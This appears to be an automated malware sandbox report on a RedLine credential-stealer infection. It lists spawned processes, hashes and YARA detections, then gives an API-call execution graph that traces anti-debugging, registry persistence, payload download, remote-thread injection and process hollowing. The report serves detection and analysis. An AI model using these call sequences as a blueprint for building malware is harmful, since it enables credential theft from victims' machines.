                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff7f2d00000
                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                  Start time:12:23:30
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe"
                                                                                                                                                                                                                                                  Imagebase:0xa90000
                                                                                                                                                                                                                                                  File size:307'712 bytes
                                                                                                                                                                                                                                                  MD5 hash:97EB7BAA28471EC31E5373FCD7B8C880
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000000.1943582623.0000000000A92000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 74%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                  Start time:12:23:39
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff7821c0000
                                                                                                                                                                                                                                                  File size:25'600 bytes
                                                                                                                                                                                                                                                  MD5 hash:031377E4E34DCD19917FAC02FF6DA79F
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                  Start time:12:23:39
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff6626d0000
                                                                                                                                                                                                                                                  File size:632'808 bytes
                                                                                                                                                                                                                                                  MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                  Start time:12:23:39
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                  Start time:12:23:39
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff7f2d00000
                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                  Start time:12:23:41
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff69f3e0000
                                                                                                                                                                                                                                                  File size:5'915'952 bytes
                                                                                                                                                                                                                                                  MD5 hash:D9AE4AB7E356E38950359025308C78F9
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 21%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                  Start time:12:23:43
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff69f3e0000
                                                                                                                                                                                                                                                  File size:5'915'952 bytes
                                                                                                                                                                                                                                                  MD5 hash:D9AE4AB7E356E38950359025308C78F9
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:41.2%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:54.2%
                                                                                                                                                                                                                                                    Total number of Nodes:472
                                                                                                                                                                                                                                                    Total number of Limit Nodes:11
                                                                                                                                                                                                                                                    execution_graph 762 7ff63a8332b0 765 7ff63a831f8c GetModuleFileNameW 762->765 766 7ff63a83200d 765->766 767 7ff63a832008 765->767 768 7ff63a83204b 766->768 769 7ff63a832061 766->769 770 7ff63a83207f 768->770 771 7ff63a832055 768->771 808 7ff63a831ecc ExpandEnvironmentStringsW 769->808 809 7ff63a831f0c ExpandEnvironmentStringsW 770->809 771->767 810 7ff63a831f4c ExpandEnvironmentStringsW 771->810 773 7ff63a832076 773->767 776 7ff63a8320d1 CreateProcessW 773->776 776->767 777 7ff63a83212c CreateFileW 776->777 777->767 778 7ff63a832173 GetFileSize 777->778 779 7ff63a83219b CloseHandle 778->779 780 7ff63a832191 778->780 779->767 780->779 781 7ff63a8321ab VirtualAlloc 780->781 782 7ff63a8321e5 ReadFile 781->782 783 7ff63a8321d5 CloseHandle 781->783 784 7ff63a832235 CloseHandle GetThreadContext 782->784 785 7ff63a832212 VirtualFree CloseHandle 782->785 783->767 786 7ff63a83229d ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 784->786 787 7ff63a832285 VirtualFree 784->787 785->767 788 7ff63a83233c VirtualAllocEx 786->788 789 7ff63a832324 VirtualFree 786->789 787->767 790 7ff63a8323a7 VirtualFree 788->790 791 7ff63a8323bf WriteProcessMemory 788->791 789->767 790->767 792 7ff63a8323f5 VirtualFree 791->792 794 7ff63a83240d 791->794 792->767 793 7ff63a832443 WriteProcessMemory 793->794 795 7ff63a8324ce VirtualFree 793->795 794->793 800 7ff63a8324eb 794->800 795->767 796 7ff63a8327dc WriteProcessMemory SetThreadContext 798 7ff63a832877 ResumeThread 796->798 799 7ff63a832862 VirtualFree 796->799 797 7ff63a83255d RtlCompareMemory 797->800 804 7ff63a8325b0 797->804 801 7ff63a832889 VirtualFree 798->801 802 7ff63a83289e VirtualFree 798->802 799->767 800->796 800->797 801->767 802->767 803 7ff63a8327d7 803->796 804->803 805 7ff63a8326e0 ReadProcessMemory WriteProcessMemory 804->805 806 7ff63a8327cd 805->806 807 7ff63a8327b5 VirtualFree 805->807 806->804 807->767 808->773 809->773 810->773 814 7ff63a833290 815 7ff63a831f8c 37 API calls 814->815 816 7ff63a8332a0 815->816 817 7ff63a833360 878 7ff63a8310a0 817->878 822 7ff63a833378 ExitProcess 823 7ff63a833380 1098 7ff63a834168 GetCurrentProcess OpenProcessToken 823->1098 827 7ff63a83339b 828 7ff63a8333b0 827->828 829 7ff63a8333ff 827->829 830 7ff63a8342a8 3 API calls 828->830 834 7ff63a833450 829->834 835 7ff63a833414 829->835 831 7ff63a8333bc 830->831 832 7ff63a8333d6 ExitProcess 831->832 833 7ff63a8333c3 831->833 836 7ff63a8342a8 3 API calls 833->836 841 7ff63a8334a6 834->841 842 7ff63a833465 834->842 837 7ff63a8342a8 3 API calls 835->837 838 7ff63a8333cf 836->838 839 7ff63a833420 837->839 838->832 840 7ff63a8333de 838->840 843 7ff63a833427 ExitProcess 839->843 844 7ff63a83342f 839->844 1132 7ff63a833210 840->1132 1122 7ff63a833978 841->1122 1113 7ff63a8342a8 CreateMutexA 842->1113 845 7ff63a833180 21 API calls 844->845 849 7ff63a833434 845->849 853 7ff63a833448 ExitProcess 849->853 854 7ff63a83343b Sleep 849->854 851 7ff63a8333e3 856 7ff63a8333f7 ExitProcess 851->856 857 7ff63a8333ea Sleep 851->857 854->849 857->851 858 7ff63a833478 ExitProcess 859 7ff63a833480 1117 7ff63a833180 859->1117 862 7ff63a8334be 865 7ff63a8342a8 3 API calls 862->865 863 7ff63a833512 7 API calls 864 7ff63a833485 866 7ff63a833499 ExitProcess 864->866 867 7ff63a83348c Sleep 864->867 868 7ff63a8334ca 865->868 867->864 869 7ff63a8334d1 868->869 870 7ff63a8334e4 ExitProcess 868->870 871 7ff63a8342a8 3 API calls 869->871 872 7ff63a8334dd 871->872 872->870 873 7ff63a8334ec 872->873 874 7ff63a833210 51 API calls 873->874 875 7ff63a8334f1 874->875 876 7ff63a8334f8 Sleep 875->876 877 7ff63a833505 ExitProcess 875->877 876->875 1141 7ff63a831000 LoadLibraryA GetProcAddress 878->1141 880 7ff63a831131 1142 7ff63a831000 LoadLibraryA GetProcAddress 880->1142 882 7ff63a83114b 1143 7ff63a831050 LoadLibraryA GetProcAddress 882->1143 884 7ff63a831165 1144 7ff63a831050 LoadLibraryA GetProcAddress 884->1144 886 7ff63a83117f 1145 7ff63a831050 LoadLibraryA GetProcAddress 886->1145 888 7ff63a831199 1146 7ff63a831050 LoadLibraryA GetProcAddress 888->1146 890 7ff63a8311b3 1147 7ff63a831050 LoadLibraryA GetProcAddress 890->1147 892 7ff63a8311cd 1148 7ff63a831050 LoadLibraryA GetProcAddress 892->1148 894 7ff63a8311e7 1149 7ff63a831050 LoadLibraryA GetProcAddress 894->1149 896 7ff63a831201 1150 7ff63a831050 LoadLibraryA GetProcAddress 896->1150 898 7ff63a83121b 1151 7ff63a831050 LoadLibraryA GetProcAddress 898->1151 900 7ff63a831235 1152 7ff63a831050 LoadLibraryA GetProcAddress 900->1152 902 7ff63a83124f 1153 7ff63a831050 LoadLibraryA GetProcAddress 902->1153 904 7ff63a831269 1154 7ff63a831050 LoadLibraryA GetProcAddress 904->1154 906 7ff63a831283 1155 7ff63a831050 LoadLibraryA GetProcAddress 906->1155 908 7ff63a83129d 1156 7ff63a831050 LoadLibraryA GetProcAddress 908->1156 910 7ff63a8312b7 1157 7ff63a831050 LoadLibraryA GetProcAddress 910->1157 912 7ff63a8312d1 1158 7ff63a831050 LoadLibraryA GetProcAddress 912->1158 914 7ff63a8312eb 1159 7ff63a831050 LoadLibraryA GetProcAddress 914->1159 916 7ff63a831305 1160 7ff63a831050 LoadLibraryA GetProcAddress 916->1160 918 7ff63a83131f 1161 7ff63a831050 LoadLibraryA GetProcAddress 918->1161 920 7ff63a831339 1162 7ff63a831050 LoadLibraryA GetProcAddress 920->1162 922 7ff63a831353 1163 7ff63a831050 LoadLibraryA GetProcAddress 922->1163 924 7ff63a83136d 1164 7ff63a831050 LoadLibraryA GetProcAddress 924->1164 926 7ff63a831387 1165 7ff63a831050 LoadLibraryA GetProcAddress 926->1165 928 7ff63a8313a1 1166 7ff63a831050 LoadLibraryA GetProcAddress 928->1166 930 7ff63a8313bb 1167 7ff63a831050 LoadLibraryA GetProcAddress 930->1167 932 7ff63a8313d5 1168 7ff63a831050 LoadLibraryA GetProcAddress 932->1168 934 7ff63a8313ef 1169 7ff63a831050 LoadLibraryA GetProcAddress 934->1169 936 7ff63a831409 1170 7ff63a831050 LoadLibraryA GetProcAddress 936->1170 938 7ff63a831423 1171 7ff63a831050 LoadLibraryA GetProcAddress 938->1171 940 7ff63a83143d 1172 7ff63a831050 LoadLibraryA GetProcAddress 940->1172 942 7ff63a831457 1173 7ff63a831050 LoadLibraryA GetProcAddress 942->1173 944 7ff63a831471 1174 7ff63a831050 LoadLibraryA GetProcAddress 944->1174 946 7ff63a83148b 1175 7ff63a831050 LoadLibraryA GetProcAddress 946->1175 948 7ff63a8314a5 1176 7ff63a831050 LoadLibraryA GetProcAddress 948->1176 950 7ff63a8314bf 1177 7ff63a831050 LoadLibraryA GetProcAddress 950->1177 952 7ff63a8314d9 1178 7ff63a831050 LoadLibraryA GetProcAddress 952->1178 954 7ff63a8314f3 1179 7ff63a831050 LoadLibraryA GetProcAddress 954->1179 956 7ff63a83150d 1180 7ff63a831050 LoadLibraryA GetProcAddress 956->1180 958 7ff63a831527 1181 7ff63a831050 LoadLibraryA GetProcAddress 958->1181 960 7ff63a831541 1182 7ff63a831050 LoadLibraryA GetProcAddress 960->1182 962 7ff63a83155b 1183 7ff63a831050 LoadLibraryA GetProcAddress 962->1183 964 7ff63a831575 1184 7ff63a831050 LoadLibraryA GetProcAddress 964->1184 966 7ff63a83158f 1185 7ff63a831050 LoadLibraryA GetProcAddress 966->1185 968 7ff63a8315a9 1186 7ff63a831050 LoadLibraryA GetProcAddress 968->1186 970 7ff63a8315c3 1187 7ff63a831050 LoadLibraryA GetProcAddress 970->1187 972 7ff63a8315dd 1188 7ff63a831050 LoadLibraryA GetProcAddress 972->1188 974 7ff63a8315f7 1189 7ff63a831050 LoadLibraryA GetProcAddress 974->1189 976 7ff63a831611 1190 7ff63a831050 LoadLibraryA GetProcAddress 976->1190 978 7ff63a83162b 1191 7ff63a831050 LoadLibraryA GetProcAddress 978->1191 980 7ff63a831645 1192 7ff63a831050 LoadLibraryA GetProcAddress 980->1192 982 7ff63a83165f 1193 7ff63a831050 LoadLibraryA GetProcAddress 982->1193 984 7ff63a831679 1194 7ff63a831050 LoadLibraryA GetProcAddress 984->1194 986 7ff63a831693 1195 7ff63a831050 LoadLibraryA GetProcAddress 986->1195 988 7ff63a8316ad 1196 7ff63a831050 LoadLibraryA GetProcAddress 988->1196 990 7ff63a8316c7 1197 7ff63a831050 LoadLibraryA GetProcAddress 990->1197 992 7ff63a8316e1 1198 7ff63a831050 LoadLibraryA GetProcAddress 992->1198 994 7ff63a8316fb 1199 7ff63a831050 LoadLibraryA GetProcAddress 994->1199 996 7ff63a831715 1200 7ff63a831050 LoadLibraryA GetProcAddress 996->1200 998 7ff63a83172f 1201 7ff63a831050 LoadLibraryA GetProcAddress 998->1201 1000 7ff63a831749 1202 7ff63a831050 LoadLibraryA GetProcAddress 1000->1202 1002 7ff63a831763 1203 7ff63a831050 LoadLibraryA GetProcAddress 1002->1203 1004 7ff63a83177d 1204 7ff63a831050 LoadLibraryA GetProcAddress 1004->1204 1006 7ff63a831797 1205 7ff63a831050 LoadLibraryA GetProcAddress 1006->1205 1008 7ff63a8317b1 1206 7ff63a831050 LoadLibraryA GetProcAddress 1008->1206 1010 7ff63a8317cb 1207 7ff63a831050 LoadLibraryA GetProcAddress 1010->1207 1012 7ff63a8317e5 1208 7ff63a831050 LoadLibraryA GetProcAddress 1012->1208 1014 7ff63a8317ff 1209 7ff63a831050 LoadLibraryA GetProcAddress 1014->1209 1016 7ff63a831819 1210 7ff63a831050 LoadLibraryA GetProcAddress 1016->1210 1018 7ff63a831833 1211 7ff63a831050 LoadLibraryA GetProcAddress 1018->1211 1020 7ff63a83184d 1212 7ff63a831050 LoadLibraryA GetProcAddress 1020->1212 1022 7ff63a831867 1213 7ff63a831050 LoadLibraryA GetProcAddress 1022->1213 1024 7ff63a831881 1214 7ff63a831050 LoadLibraryA GetProcAddress 1024->1214 1026 7ff63a83189b 1215 7ff63a831050 LoadLibraryA GetProcAddress 1026->1215 1028 7ff63a8318b5 1216 7ff63a831050 LoadLibraryA GetProcAddress 1028->1216 1030 7ff63a8318cf 1217 7ff63a831050 LoadLibraryA GetProcAddress 1030->1217 1032 7ff63a8318e9 1218 7ff63a831050 LoadLibraryA GetProcAddress 1032->1218 1034 7ff63a831903 1219 7ff63a831050 LoadLibraryA GetProcAddress 1034->1219 1036 7ff63a83191d 1220 7ff63a831050 LoadLibraryA GetProcAddress 1036->1220 1038 7ff63a831937 1221 7ff63a831050 LoadLibraryA GetProcAddress 1038->1221 1040 7ff63a831951 1222 7ff63a831050 LoadLibraryA GetProcAddress 1040->1222 1042 7ff63a83196b 1223 7ff63a831050 LoadLibraryA GetProcAddress 1042->1223 1044 7ff63a831985 1224 7ff63a831050 LoadLibraryA GetProcAddress 1044->1224 1046 7ff63a83199f 1225 7ff63a831050 LoadLibraryA GetProcAddress 1046->1225 1048 7ff63a8319b9 1226 7ff63a831050 LoadLibraryA GetProcAddress 1048->1226 1050 7ff63a8319d3 1227 7ff63a831050 LoadLibraryA GetProcAddress 1050->1227 1052 7ff63a8319ed 1228 7ff63a831050 LoadLibraryA GetProcAddress 1052->1228 1054 7ff63a831a07 1229 7ff63a831050 LoadLibraryA GetProcAddress 1054->1229 1056 7ff63a831a21 1230 7ff63a831050 LoadLibraryA GetProcAddress 1056->1230 1058 7ff63a831a3b 1231 7ff63a831050 LoadLibraryA GetProcAddress 1058->1231 1060 7ff63a831a55 1232 7ff63a831050 LoadLibraryA GetProcAddress 1060->1232 1062 7ff63a831a6f 1233 7ff63a831050 LoadLibraryA GetProcAddress 1062->1233 1064 7ff63a831a89 1234 7ff63a831050 LoadLibraryA GetProcAddress 1064->1234 1066 7ff63a831aa3 1235 7ff63a831000 LoadLibraryA GetProcAddress 1066->1235 1068 7ff63a831abd 1236 7ff63a831050 LoadLibraryA GetProcAddress 1068->1236 1070 7ff63a831ad7 1237 7ff63a831050 LoadLibraryA GetProcAddress 1070->1237 1072 7ff63a831af1 1238 7ff63a831050 LoadLibraryA GetProcAddress 1072->1238 1074 7ff63a831b0b 1239 7ff63a831050 LoadLibraryA GetProcAddress 1074->1239 1076 7ff63a831b25 1240 7ff63a831050 LoadLibraryA GetProcAddress 1076->1240 1078 7ff63a831b3f 1241 7ff63a831050 LoadLibraryA GetProcAddress 1078->1241 1080 7ff63a831b59 1242 7ff63a831050 LoadLibraryA GetProcAddress 1080->1242 1082 7ff63a831b73 1243 7ff63a831050 LoadLibraryA GetProcAddress 1082->1243 1084 7ff63a831b8d 1244 7ff63a831050 LoadLibraryA GetProcAddress 1084->1244 1086 7ff63a831ba7 1245 7ff63a831050 LoadLibraryA GetProcAddress 1086->1245 1088 7ff63a831bc1 1246 7ff63a831050 LoadLibraryA GetProcAddress 1088->1246 1090 7ff63a831bdb 1247 7ff63a831050 LoadLibraryA GetProcAddress 1090->1247 1092 7ff63a831bf5 1248 7ff63a831050 LoadLibraryA GetProcAddress 1092->1248 1094 7ff63a831c0f 1095 7ff63a833120 IsDebuggerPresent 1094->1095 1096 7ff63a833132 GetCurrentProcess CheckRemoteDebuggerPresent 1095->1096 1097 7ff63a83312e 1095->1097 1096->1097 1097->822 1097->823 1099 7ff63a833385 1098->1099 1100 7ff63a83418e GetTokenInformation 1098->1100 1109 7ff63a833be8 GetModuleFileNameW 1099->1109 1249 7ff63a833a58 VirtualAlloc 1100->1249 1102 7ff63a8341bf GetTokenInformation 1103 7ff63a8341ec CloseHandle 1102->1103 1107 7ff63a834206 AdjustTokenPrivileges CloseHandle 1102->1107 1104 7ff63a833a28 VirtualFree 1103->1104 1105 7ff63a834201 1104->1105 1105->1099 1250 7ff63a833a28 1107->1250 1110 7ff63a833cd6 wcsncpy 1109->1110 1111 7ff63a833c13 PathFindFileNameW wcslen 1109->1111 1112 7ff63a833c4d 1110->1112 1111->1112 1112->827 1114 7ff63a833471 1113->1114 1115 7ff63a8342d4 GetLastError 1113->1115 1114->858 1114->859 1115->1114 1116 7ff63a8342e1 CloseHandle 1115->1116 1116->1114 1253 7ff63a8337c8 1117->1253 1119 7ff63a833190 1256 7ff63a8343b8 CreateFileW 1119->1256 1123 7ff63a833648 3 API calls 1122->1123 1124 7ff63a8339a3 1123->1124 1125 7ff63a8337c8 11 API calls 1124->1125 1126 7ff63a8339ad GetModuleFileNameW DeleteFileW CopyFileW 1125->1126 1127 7ff63a8334ab 1126->1127 1128 7ff63a8339ef SetFileAttributesW 1126->1128 1130 7ff63a8332f0 GetVersionExW 1127->1130 1273 7ff63a8338b8 RegOpenKeyExW 1128->1273 1131 7ff63a833321 1130->1131 1131->862 1131->863 1133 7ff63a8337c8 11 API calls 1132->1133 1134 7ff63a833221 1133->1134 1276 7ff63a831c20 1134->1276 1136 7ff63a83327d 1136->851 1137 7ff63a83323b 1137->1136 1293 7ff63a833fc8 1137->1293 1141->880 1142->882 1143->884 1144->886 1145->888 1146->890 1147->892 1148->894 1149->896 1150->898 1151->900 1152->902 1153->904 1154->906 1155->908 1156->910 1157->912 1158->914 1159->916 1160->918 1161->920 1162->922 1163->924 1164->926 1165->928 1166->930 1167->932 1168->934 1169->936 1170->938 1171->940 1172->942 1173->944 1174->946 1175->948 1176->950 1177->952 1178->954 1179->956 1180->958 1181->960 1182->962 1183->964 1184->966 1185->968 1186->970 1187->972 1188->974 1189->976 1190->978 1191->980 1192->982 1193->984 1194->986 1195->988 1196->990 1197->992 1198->994 1199->996 1200->998 1201->1000 1202->1002 1203->1004 1204->1006 1205->1008 1206->1010 1207->1012 1208->1014 1209->1016 1210->1018 1211->1020 1212->1022 1213->1024 1214->1026 1215->1028 1216->1030 1217->1032 1218->1034 1219->1036 1220->1038 1221->1040 1222->1042 1223->1044 1224->1046 1225->1048 1226->1050 1227->1052 1228->1054 1229->1056 1230->1058 1231->1060 1232->1062 1233->1064 1234->1066 1235->1068 1236->1070 1237->1072 1238->1074 1239->1076 1240->1078 1241->1080 1242->1082 1243->1084 1244->1086 1245->1088 1246->1090 1247->1092 1248->1094 1249->1102 1251 7ff63a833a39 VirtualFree 1250->1251 1252 7ff63a833a4c 1250->1252 1251->1252 1252->1099 1262 7ff63a833648 GetWindowsDirectoryW 1253->1262 1255 7ff63a8337f7 8 API calls 1255->1119 1257 7ff63a83440e 1256->1257 1258 7ff63a83442f GetLastError 1256->1258 1267 7ff63a834308 GetFileSize 1257->1267 1259 7ff63a8331a3 CreateThread Sleep CreateThread 1258->1259 1259->864 1263 7ff63a83369c GetVolumeInformationW 1262->1263 1264 7ff63a833692 1262->1264 1266 7ff63a833718 1263->1266 1264->1263 1265 7ff63a833782 wsprintfW 1265->1255 1266->1265 1272 7ff63a833a58 VirtualAlloc 1267->1272 1269 7ff63a834334 1270 7ff63a834348 SetFilePointer ReadFile 1269->1270 1271 7ff63a83437e CloseHandle 1269->1271 1270->1271 1271->1259 1272->1269 1274 7ff63a8338f9 1273->1274 1275 7ff63a8338fd RegSetValueExW RegCloseKey 1273->1275 1274->1127 1275->1274 1277 7ff63a831c4a InternetOpenW 1276->1277 1278 7ff63a831c77 Sleep 1277->1278 1279 7ff63a831c84 InternetOpenUrlW 1277->1279 1278->1277 1280 7ff63a831d0d HttpQueryInfoA 1279->1280 1281 7ff63a831cbb InternetOpenUrlW 1279->1281 1283 7ff63a831d3c InternetCloseHandle InternetCloseHandle Sleep 1280->1283 1284 7ff63a831d62 1280->1284 1281->1280 1282 7ff63a831cf2 InternetCloseHandle Sleep 1281->1282 1282->1277 1283->1277 1285 7ff63a831dc9 HttpQueryInfoA GetProcessHeap HeapAlloc 1284->1285 1286 7ff63a831d6c InternetCloseHandle InternetOpenUrlW 1284->1286 1287 7ff63a831e48 1285->1287 1288 7ff63a831e2e InternetCloseHandle InternetCloseHandle 1285->1288 1286->1285 1289 7ff63a831dae InternetCloseHandle Sleep 1286->1289 1291 7ff63a831e50 InternetReadFile 1287->1291 1292 7ff63a831e9e InternetCloseHandle InternetCloseHandle 1287->1292 1290 7ff63a831ec7 1288->1290 1289->1277 1290->1137 1291->1287 1291->1292 1292->1290 1308 7ff63a833f08 CreateToolhelp32Snapshot 1293->1308 1296 7ff63a833fe8 1297 7ff63a83404f GetCurrentProcess OpenProcessToken 1296->1297 1298 7ff63a8340c6 OpenProcess 1297->1298 1299 7ff63a83406c LookupPrivilegeValueW 1297->1299 1302 7ff63a8340e8 1298->1302 1303 7ff63a8340f2 1298->1303 1300 7ff63a8340bb CloseHandle 1299->1300 1301 7ff63a834094 AdjustTokenPrivileges 1299->1301 1300->1298 1301->1300 1305 7ff63a834148 CloseHandle 1302->1305 1306 7ff63a834153 1302->1306 1303->1302 1307 7ff63a834126 WaitForSingleObject 1303->1307 1315 7ff63a832bfc 1303->1315 1305->1306 1306->1136 1307->1297 1307->1302 1309 7ff63a833268 1308->1309 1310 7ff63a833f43 Process32FirstW 1308->1310 1309->1296 1311 7ff63a833f9d CloseHandle 1310->1311 1312 7ff63a833f62 wcscmp 1310->1312 1311->1309 1313 7ff63a833f79 1312->1313 1314 7ff63a833f86 Process32NextW 1312->1314 1313->1311 1314->1311 1314->1312 1316 7ff63a832c4f 1315->1316 1318 7ff63a832c6f 1316->1318 1319 7ff63a832c91 VirtualAllocEx 1316->1319 1323 7ff63a8329cc 1316->1323 1318->1303 1319->1318 1320 7ff63a832ccb WriteProcessMemory 1319->1320 1320->1318 1321 7ff63a832d14 VirtualProtectEx 1320->1321 1321->1318 1322 7ff63a832d47 CreateRemoteThread 1321->1322 1322->1316 1322->1318 1324 7ff63a832a45 1323->1324 1325 7ff63a832b4e StrStrA 1324->1325 1326 7ff63a832a4c 1324->1326 1325->1324 1325->1326 1326->1316 1327 7ff63a832ed0 1328 7ff63a831c20 22 API calls 1327->1328 1329 7ff63a832f04 1328->1329 1330 7ff63a833fc8 5 API calls 1329->1330 1331 7ff63a832f27 1330->1331 1332 7ff63a833fe8 13 API calls 1331->1332 1333 7ff63a832f3c GetProcessHeap HeapFree 1332->1333 1334 7ff63a8330f0 1335 7ff63a8330f9 1334->1335 1336 7ff63a833112 1335->1336 1339 7ff63a832f70 1335->1339 1344 7ff63a832e30 CreateMutexA 1339->1344 1342 7ff63a832f8b Sleep CreateThread WaitForSingleObject 1343 7ff63a832fd0 Sleep 1342->1343 1343->1335 1345 7ff63a832e79 GetLastError 1344->1345 1346 7ff63a832e5c ReleaseMutex CloseHandle 1344->1346 1348 7ff63a832e86 ReleaseMutex CloseHandle 1345->1348 1349 7ff63a832ea3 ReleaseMutex CloseHandle 1345->1349 1347 7ff63a832ebb 1346->1347 1347->1342 1347->1343 1348->1347 1349->1347 1350 7ff63a832db0 1351 7ff63a8337c8 11 API calls 1350->1351 1352 7ff63a832dc0 1351->1352 1357 7ff63a834808 CreateFileW 1352->1357 1355 7ff63a834808 17 API calls 1356 7ff63a832e11 1355->1356 1358 7ff63a832deb 1357->1358 1359 7ff63a83486e GetFileSize GetProcessHeap HeapAlloc 1357->1359 1358->1355 1360 7ff63a8348c9 ReadFile 1359->1360 1361 7ff63a8348b7 